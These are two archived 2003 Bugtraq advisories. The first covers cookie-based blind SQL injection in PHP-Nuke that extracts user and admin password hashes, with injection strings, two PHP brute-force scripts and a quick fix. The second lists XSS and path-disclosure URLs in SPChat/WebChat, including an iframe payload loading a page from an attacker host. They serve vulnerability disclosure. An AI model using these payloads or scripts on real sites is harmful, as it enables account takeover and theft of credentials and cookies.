103126 2003-06-01  22:08  /235 rader/ bugsman <bugsman@libero.it>
Importerad: 2003-06-01  22:08  av Brevbäraren
Extern mottagare: bugtraq <bugtraq@securityfocus.com>
Mottagare: Bugtraq (import) <5097>
Ärende: Php-Nuke:users and admins password hashes vulnerability
------------------------------------------------------------
BUGSMAN: serving security from Italy since..hem..well, about 1 year 
------------------------------------------------------------------------------------- 
Object: users & admins password hash retrieving 
Tested on Php-Nuke 5.6 e 6.5 
Vulnerable versions: I've never seen a patch for this so potentially all versions could be vulnerable... 
------------------------------------------------------------------------------------- 
Description: 
An attacker can obtain password hashes for users and admins, using a particular SQL injection with cookies. 
An incredible amount of sites are vulnerable to these attacks. 
Note: Since the SQL injection works with cookies, this problem is not prevented by turning GPC_magic_quotes 
on. 
><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>< 
USER HASH: 
To get the password hash of an user, the attacker just needs a valid account... 
The attacker visits www.victimsite.com/modules.php?name=Your_Account sending a spoofed user cookie crafted 
in this way: 
uid should be: ' or (uname='username_to_hack' and pass like 'a%') or uname = 'valid_username 
uname should be:  username_to_hack 
pass should be: valid_password 
Next stepis to examine the result page. If the page is the login page (the one with textboxes) it means that 
the hash of the password to crack is really LIKE 'a%' and the attacker can go on with the next character. 
If the page is the details page for the username_to_hack, then it's time to try LIKE 'B%'... 
In max 512 guesses the attacker has the hash of username_to_hack and now it is possible to create a spoofed 
cookie to be recognized as username_to_hack. 
><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>< 
ADMIN HASH: 
To get the password hash of an admin, the attacker only needs to know the name of that admin, and needs that 
the Web_Links module should be active and with at least one link: 
NOTE: The attacker doesn't need a valid account, and can exploit the bug even if the Web_Links module is 
active only for registered members... 
The attacker visits www.victimsite.com/modules.php?name=Web_Links&l_op=viewlink&cid=2  
sending a spoofed admin cookie crafted in this way: 
aid should be: admin_to_hack' and pwd like 'a% 
pwd should be: anything you want 
Now the attacker examine the page: if the links have the Edit links active, it means the password hash is 
really LIKE 'a%' so go on with next character, otherwise go on with LIKE 'b%' 
NOTE: This trick works with some modification, with l_op=MostPopular and l_op=NewLinksDate too. 
With the hash the attacker can spoof a cookie and get into the admin section of the site. 
IMPORTANT NOTE: it is not really a problem to obtain the name of an admin, since the name of the God admin 
can be obtained just using this exploit with different injections. So what the attacker REALLY needs is the 
Web_Links module active and with at least one link!!!AND NOTHING MORE!!! 
><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>< 
QUICK-AND-DIRTY FIX: 
Since I contacted Francisco Burzi, but I didn't get any response I post a quick-and-dirty fix right out of 
my brain :) 
DISCLAIMER: I TAKE NO RESPONSABILITY FOR ANY KIND OF DAMAGE OR MISWORKING OF THE SITE CAUSED BY MY FIXES. 
THESE ARE NOT OFFICIAL PHP-NUKE FIXES SO APPLY THEM AT YOUR OWN RISK! 
ANOTHER NOTE: I FIX MY PHP-NUKE THIS WAY AND IT WORKS, IT SHOULD WORK FOR YOU TOO.... 
FIXING USER EXPLOIT: 
in file /mainfile.php, in function is_user, before the line: 
   if ($uid != '' AND $pwd != '')  
add this line: 
$uid=addslashes($uid); 
 
FIXING ADMIN EXPLOIT: 
in file /modules/Web_Links/index.php, in functions NewLinksDate, MostPopular and viewlink 
before the line: 
$admin=explode(":",$admin); 
add this line: 
$admin=addslashes($admin); 
then change this line: 
$result3=sql_query("select radminlink,radminsuper from ".$prefix."_authors where aid ='$aid'", dbi); 
and make it look like this one: 
$result3=sql_query("select radminlink,radminsuper from ".$prefix."_authors where aid='$aid' and 
pwd='$admin[1]'", dbi); 
NOTE: YOU HAVE TO DO THIS FOR ALL THE 3 FUNCTIONS LISTED BEFORE!!! 
><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>< 
ARE YOU WEAK? 
Here you can find two php pages that you can use to find out if your site is vulnerable to this attack. Just 
upload the pages on the webserver running php-nuke in the same directory for your config.php and open them. 
NOTE:THESE SCRIPT ARE VERY POOR-CODED, AND I DO NOT ASSURE THAT THEIR 
RESPONSE IS RIGHT!  THEY WORKED FOR ME AND I HOPE THEY WORK FOR YOU TOO! SORRY FOR THE POOR CODING BUT THE 
SCRIPTS WERE MADE IN HALF AN HOUR :) 
NOTE: BEFORE YOU EXECUTE THE SCRIPT, BE SURE TO PERSONALIZE THE VALUES WHERE INDICATED!!! 
This one is to check  the user vulnerability: 
><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>< 
<?php 
//Test-script for PHP-NUKE Vulnerabilities: Bugsman made it, yeah!!!! 
//This one checks for the user password hash retrieving vulnerability 
//Note: adjust the script execution time in your php.ini if the script 
//takes too long 
$server="localhost"; 
$script="/modules.php?name=Your_Account"; 
$validaccount="account";// <---Put a valid username here!!! 
$validpass="password";   // <---Put the password for the above username here!!! 
$account_to_hack="pippo";//<--- Put another valid username here!!! 
$md5char[0]="0"; 
$md5char[1]="1"; 
$md5char[2]="2"; 
$md5char[3]="3"; 
$md5char[4]="4"; 
$md5char[5]="5"; 
$md5char[6]="6"; 
$md5char[7]="7"; 
$md5char[8]="8"; 
$md5char[9]="9"; 
$md5char[10]="a"; 
$md5char[11]="b"; 
$md5char[12]="c"; 
$md5char[13]="d"; 
$md5char[14]="e"; 
$md5char[15]="f"; 
$found=0; 
$md5reg=""; 
 
function sendToHost($host,$method,$path,$cook) 
{ 
	$buf=""; 
	$method = strtoupper($method); 
	$fp = fsockopen($host,80); 
	fputs($fp, "$method $path HTTP/1.1\n"); 
	fputs($fp, "Host: $host\n"); 
	fputs($fp, "Connection: close\n"); 
	fputs($fp, "Pragma: no-cache\n"); 
	fputs($fp, "Cache-control: no-cache\n"); 
	fputs($fp, "Cookie: user=$cook; lang=italian\n"); 
	fputs($fp, "\n\n"); 
	while (!feof($fp)) 
		$buf .= fgets($fp,128); 
	fclose($fp); 
	return $buf; 
} 
if (!isset($charindex)) 
	$charindex=0; 
$found=0; 
while($charindex<16){ 
	$md5reg="$md5char[$charindex]%"; 
	$uid="' or (uname = '$account_to_hack' and pass like '$md5reg') or uname = '$validaccount"; 
	$validpass=md5("$validpass"); 
	$cookie=base64_encode("$uid:$account_to_hack:$validpass"); 
	$cookie=str_replace("=","%3D",$cookie); 
	$data=sendToHost("$server","get","$script","$cookie"); 
	if (eregi("Password",$data)){ 
		$found += 1; 
		$charindex += 1; 
	} 
	else{ $charindex += 1; 
		Header("Location: ".$PHP_SELF."?charindex=$charindex&charfound=$charfound&curmd5=$curmd5"); 
	} 
} 
echo "Test-script for PHP-NUKE Vulnerabilities: Bugsman made it, yeah!!!!<br>"; 
echo "This one check for the user password hash retrieving vulnerability...<br>"; 
if($found==16) 
	echo "You are NOT vulnerable<br>"; 
else 
	echo "You are vulnerable!<br>Apply a fix ASAP<br>"; 
echo "BUGSMAN: serving security from Italy since...hem, well, about 1 year :)<br>"; 
?> 
><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>< 
And this one is to check the admin vulnerability: 
><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>< 
<?php 
//Test-script for PHP-NUKE Vulnerabilities: Bugsman made it, yeah!!!! 
//This one checks for the admin password hash retrieving vulnerability 
//Note: adjust the script execution time in your php.ini if the script 
//takes too long 
$server="localhost"; 
$script="/modules.php?name=Web_Links&l_op=viewlink&cid=1";//<---put a cid that shows a page with links in it 
$account_to_hack="admin";//<--- Put the admin username here!!! 
$md5char[0]="0"; 
$md5char[1]="1"; 
$md5char[2]="2"; 
$md5char[3]="3"; 
$md5char[4]="4"; 
$md5char[5]="5"; 
$md5char[6]="6"; 
$md5char[7]="7"; 
$md5char[8]="8"; 
$md5char[9]="9"; 
$md5char[10]="a"; 
$md5char[11]="b"; 
$md5char[12]="c"; 
$md5char[13]="d"; 
$md5char[14]="e"; 
$md5char[15]="f"; 
$found=0; 
$md5reg=""; 
 
function sendToHost($host,$method,$path,$cook) 
{ 
	$buf=""; 
	$method = strtoupper($method); 
	$fp = fsockopen($host,80); 
	fputs($fp, "$method $path HTTP/1.1\n"); 
	fputs($fp, "Host: $host\n"); 
	fputs($fp, "Connection: close\n"); 
	fputs($fp, "Pragma: no-cache\n"); 
	fputs($fp, "Cache-control: no-cache\n"); 
	fputs($fp, "Cookie: admin=$cook; lang=italian\n"); 
	fputs($fp, "\n\n"); 
	while (!feof($fp)) 
		$buf .= fgets($fp,128); 
	fclose($fp); 
	return $buf; 
} 
if (!isset($charindex)) 
	$charindex=0; 
$found=0; 
while(($charindex<16)&&($found==0)){ 
	$md5reg="$md5char[$charindex]%"; 
	$aid="$account_to_hack' and pwd like '$md5reg"; 
	$validpass=md5("useless_pass"); 
	$cookie=base64_encode("$aid:$validpass"); 
	$cookie=str_replace("=","%3D",$cookie); 
	$data=sendToHost("$server","get","$script","$cookie"); 
	if (eregi("Edit",$data)){ 
		$found += 1; 
		$charindex += 1; 
	} 
	else{ $charindex += 1; 
//		echo "$data"; 
		Header("Location: ".$PHP_SELF."?charindex=$charindex"); 
	} 
} 
echo "Test-script for PHP-NUKE Vulnerabilities: Bugsman made it, yeah!!!!<br>"; 
echo "This one check for the admin password hash retrieving vulnerability...<br>"; 
if($found==0) 
	echo "You are NOT vulnerable<br>"; 
else 
	echo "You are vulnerable!<br>Apply a fix ASAP<br>"; 
echo "BUGSMAN: serving security from Italy since...hem, well, about 1 year :)<br>"; 
?> 
><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>< 
 
For any suggestion, comments, hiring (I need money too) or any other
thing, contact me at:  bugsman@libero.it
 
See ya!!!!
(103126) /bugsman <bugsman@libero.it>/----(Ombruten)
103206 2003-06-02  18:15  /101 rader/ Rynho Zeros Web <hackargentino@gmx.net>
Importerad: 2003-06-02  18:15  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <5103>
Ärende: [ PHP-Nuke :] Multiple vulnerabilities in SPChat 2.0 for PHP-Nuke & SPChat 0.8.0
------------------------------------------------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Topic: Multiple vulnerabilities in SPChat 2.0 for PHP-Nuke & SPChat 0.8.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Systems Affected: Web Chat 2.0 for PHP-Nuke & SPChat 0.8.0
      Vendor URL: http://www.saarport.net
       Vuln Type: XSS (Cross Site Scripting), Path Disclosure,
revealed of DBUser Name, possible injection SQL
          Status: Vendor contacted, In a moment estara available the
patched version.
(http://www.saarport.net/modules.php?name=Forums&file=viewtopic&p=1029)
          Author: XyborG (http://www.rzw.com.ar)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Intro:
~~~~~~
SFChat & WebChat are very good and stable systems of chat online.  But it
has his faults :)


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Note:  The name of the WebChat module can change, I I will use that name.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:
~~~~~~~~~

Vendor has contacted and In a moment estara available the patched
version.  To Fix the script temporarily, you must erase this script
of your Web, or  change its name so that nobody has access, but
checks the Web of the creator

in search of the new patch, to be able to continue using this service.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Exploit:
~~~~~~~~

Web Chat 2.0 for PHP-Nuke:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Path Disclosure (see the source code):
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.victim.com/modules/WebChat/out.php

----- Source Code -----

<br />
<b>Warning</b>:  Access denied for user: 'victim@localhost' (Using password:
YES) in
<b>/home/virtual/site3/fst/var/www/html/modules/WebChat/inc/mysql.lib.php</b> on line <b>33</b><br />
</TD></TR></TABLE><B>Database error:</B> Link_ID == false, connect
failed<BR>
<B>MySQL error</B>: 0 ()<BR>
Session halted.

----- Source Code -----

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Path
Disclosure:
~~~~~~~~~~~~~~~~
http://www.victim.com/modules.php?op=modload&name=WebChat&file=index&roomid=Non_Numeric

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Path Disclorure & revealed of DBUser Name & XSS, SQL Injection?
:
http://www.victim.com/modules/WebChat/in.php
http://www.victim.com/modules/WebChat/quit.php
http://www.victim.com/modules/WebChat/users.php
http://www.victim.com/modules/WebChat/users.php?rid=Non_Numeric&uid=-1&username=[Any_Word_or_your_code]
http://www.victim.com/modules/WebChat/users.php?rid=Non_Numeric&uid=-1&username="><script>alert(document.cookie);</script>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SPChat Ver.
0.8.0:
~~~~~~~~~~~~~~~~~~~~~~
http://www.victim.com/modules.php?op=modload&name=SPChat&file=index&statussess=<IFRAME%20src="http://www.attacker.com.ar/attack.htm"%20marginWidth=0%20marginHeight=0%20frameBorder=0%20width=500%20scrolling=yes%20height=500></IFRAME>

----- Source Code For attack.htm for eg. -----
?script>
alert(document.cookie);
?/script>
----- Source Code For attack.htm -----

(Note:  Replace '?'  by '<')

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

-- 
XyBØrG
WebMaster de:
www.RZWEB.com.ar
Powered By Dattatec.Com

+++ GMX - Mail, Messaging & more  http://www.gmx.net +++
Bitte lächeln! Fotogalerie online mit GMX ohne eigene Homepage!
(103206) /Rynho Zeros Web <hackargentino@gmx.net>/(Ombruten)